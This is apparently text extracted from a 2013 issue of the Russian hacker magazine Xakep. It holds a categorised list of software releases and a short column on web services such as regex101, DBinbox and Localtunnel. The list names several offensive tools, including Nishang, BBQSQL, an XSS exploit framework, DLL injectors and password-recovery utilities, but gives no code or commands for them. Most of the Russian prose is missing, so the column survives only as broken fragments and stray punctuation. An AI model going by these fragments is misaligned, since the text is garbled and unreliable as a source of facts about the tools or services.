TCCLE 13.0
USB Oblivion 1.10
Windows Surface Scanner 2.20
WinLogOnView 1.01
WirelessKeyView 1.67

>Security
BBQSQL
Copernicus
CrowdDetox 1.0 Beta
CrowdInspect
DLLInjector 0.2
ESET NOD32 Antivirus 6
idaConsonance
Nishang 0.3.0
Phoneme
Protectorion ToGo
Topera 0.0.2
VirtualDeobfuscator
VMInjector 0.1
Watcher 1.5.8
Xenotix XSS Exploit Framework 4
XSS ChEF 0.1

>Net
Acrylic DNS Proxy 0.9.22
CrossLoop 2.82
EagleGet 1.1.0.3
Filedrop 1.1
I2P 0.9.7.1
Lanshark 0.0.2
Mailbird 1.0.6.0
NetworkLatencyView 1.0
OpenVPN 2.3.2
RetroShare 0.5.4e
SRWare Iron Browser 28.0.1550.0
Syndie 1.103b
Tor Browser Bundle 2.3.25
VPNium 1.7
Xirrus Wi-Fi Inspector 1.2.1.4
ZamZom 1.0.0

MusicBrainz Picard 1.2


Nomacs 1.4.0
NPS Image Editor 3.0.81
OpenMusicPlayer 0.3
QGifer 0.2.1
Songr 1.9.43
TAudioConverter 0.9.0

>Net
4kdownload 2.6
Anomos 0.9.5
Babel 1.4.2
Eiskaltdcpp 2.2.8
Etherape 0.9.13

>Games
Boswars 2.7
Stuntrally 2.1
Wesnoth 1.11.5

>Devel
Amber 0.11.0
Bazaar 2.6.0
Checkstyle 5.6
Codimension 2.0.2
Django-qrauth 0.1.1
Eclipse 4.3
Editra 0.7.20
Geotools 9.3
Jug 0.9.6
Mlton 20130715
Mono 3.2.1
Ocaml-top 1.1.0
Pyqt 5.0
Pysmb 1.1.5
Qtcreator 2.8.0
Sonarqube 3.5.1
Wxhexeditor 0.22
Zk 6.5.2

>>UNIX
>Desktop
Audacious 3.4
Avidemux 2.6.4
Ballroomdj 1.9
Blender 2.68a
Calligra 2.7.1
Cdemu 2.1.0
Digikam 3.3.0
Easytag 2.1.8
Ffmpeg 2.0.1
Libreoffice 4.1.0
Mp3splt 2.6
Openavitogif 0.5.7
Patool 1.3
Pinta 1.4
Qcad 3.2.0
Qmmp 0.7.1
Rosegarden 13.06
Workrave 1.10.1

Hotkey EVE 1.4.3


iBoostUp 3.7
ImageOptim 1.4.3
MySQL Workbench 6.0.6
ohmiGeneLite 5.37.3
PHP 5.5.1
TextMate 2.0 alpha
The Unarchiver 3.8
TimeTracker 0.4.4
Tomcat 7.0.41
Tor Browser Bundle 2.3.25
Transmission 2.82
Vecte 0.0.2
XAMPP 1.8.3
YouView 0.5

>X-distr
Fedora 19

>System
Conserve 0.3.0.0
Directoryexplorer 1.0
Extcarve 1.4
Linux 3.10.6
Mupen64 2.0
Nvidia 325.15
Pf-kernel 3.10.1
Reiser4 3.10
Sakura 3.1.0
Virtualbox 4.2.16
Wayland 1.2.0
Wine 1.6.0
Xen 4.3.0
Zbackup 1.1

>Server
Apache 2.4.6
Asterisk 11.5.0
Cassandra 1.2.8
CouchDB 1.3.1
CUPS 1.6.3
HAproxy 1.4.24
Lighttpd 1.4.32
Lucene 4.4
Memcached 1.4.15
MongoDB 2.4.5
nginx 1.4.2
OpenSSH 6.2
OpenVPN 2.3.2
Redis 2.6.14
Samba 4.0.8
Sphinx 2.0.8
Squid 3.3.8

>Security
Gufw 13.10
John 1.8.0
Junkie 2.5.0
Keybox 1.08.50
Pyhids 0.4
Samhain 3.0.13
Tomb 1.4
Torsocks 1.2
Xtables-addons 2.3
Yubipam 1.1.0

Fbmsg 0.12
Filezilla 3.7.3
Firefox 23.0
Httraqt 1.1.1
Jftp 1.57
Midori 0.5.4
Modemmanager 1.0.0
Pcapfix 0.7.3
Pidgin 2.10.7
Pyaggr3g470r 4.1
Sflphone 1.2.3
Transmission 2.82
Xvideoservicethief 2.5

09 (176) 2013

, ,
,




MySQL

Apache
-

78

: 290 .

,
-

LINUX

106

WWW.XAKEP.RU

OLLYDBG

14

12+

09(176) 2013

ANDROID 56

WWW 2.0
,

-

01
REGEX101 (regex101.com)
Regex101 .
.
,
. , ,
, . ,
,
.

03
DBINBOX (dbinbox.com)
DBinbox Dropbo.
. , -.
. ,
Dropbox,
. ,
. , -
-
. , (, )
( ).

144

LOCALTUNNEL (progrium.com/localtunnel)
Localtunnel gem Ruby,
-
. sudo gem install localtunnel, OS X
Console Tools Xcode.
http://xxx.localtunnel.com, ,
DynDNS . - python -m
SimpleHTTPServer
.

02
DRONESTAGRAM (www.dronestagr.am)
, Dronestagram
Instagram . ,

,
AR.Drone .
,

. ,
,
. ,
,
.

,
Dropbox
,

04

Оценить